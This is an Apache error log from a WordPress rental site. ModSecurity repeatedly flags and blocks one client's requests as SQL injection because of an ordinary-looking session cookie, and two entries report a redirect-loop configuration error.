[Mon May 11 22:24:03.041579 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI643o_DFxNSZVmaX3O9QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:03.041893 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI643o_DFxNSZVmaX3O9QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:03.627094 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI643o_DFxNSZVmaX3O9QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:04.442613 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI65Ho_DFxNSZVmaX3O9wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:04.442996 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI65Ho_DFxNSZVmaX3O9wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:05.022788 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI65Ho_DFxNSZVmaX3O9wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:05.932457 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI65Xo_DFxNSZVmaX3O-AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:05.932742 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI65Xo_DFxNSZVmaX3O-AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:06.533871 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI65Xo_DFxNSZVmaX3O-AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:07.139088 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI653o_DFxNSZVmaX3O-QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:07.139389 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI653o_DFxNSZVmaX3O-QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:07.720731 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI653o_DFxNSZVmaX3O-QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:07.934614 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI653o_DFxNSZVmaX3O-gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:07.934906 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI653o_DFxNSZVmaX3O-gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:08.502347 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI653o_DFxNSZVmaX3O-gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:08.732894 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI66Ho_DFxNSZVmaX3O_AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:08.733200 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI66Ho_DFxNSZVmaX3O_AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:09.092641 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI66Ho_DFxNSZVmaX3O_AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:09.841685 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI66Xo_DFxNSZVmaX3O_QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:09.841976 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI66Xo_DFxNSZVmaX3O_QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:10.470319 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI66Xo_DFxNSZVmaX3O_QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:11.054590 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI663o_DFxNSZVmaX3O_gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:11.054894 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI663o_DFxNSZVmaX3O_gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:11.666378 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI663o_DFxNSZVmaX3O_gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:12.246416 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI67Ho_DFxNSZVmaX3O_wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:12.246692 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI67Ho_DFxNSZVmaX3O_wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:12.833459 2026] [core:error] [pid 1605480:tid 1605541] [client 114.119.134.48:56735] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://dev.rentparadise.fr/accommodation/mobil-home-confort
[Mon May 11 22:24:12.833498 2026] [core:error] [pid 1605480:tid 1605541] [client 114.119.134.48:56735] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://dev.rentparadise.fr/accommodation/mobil-home-confort
[Mon May 11 22:24:12.862424 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI67Ho_DFxNSZVmaX3O_wAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:13.446795 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI67Xo_DFxNSZVmaX3PAAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:13.447083 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI67Xo_DFxNSZVmaX3PAAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:14.011298 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI67Xo_DFxNSZVmaX3PAAAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:14.235613 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI67no_DFxNSZVmaX3PAQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:14.235913 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI67no_DFxNSZVmaX3PAQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:14.773773 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI67no_DFxNSZVmaX3PAQAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:15.237853 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI673o_DFxNSZVmaX3PAgAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:24:15.238188 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI673o_DFxNSZVmaX3PAgAAANE"], referer: https://rentparadise.fr/wp-login.php
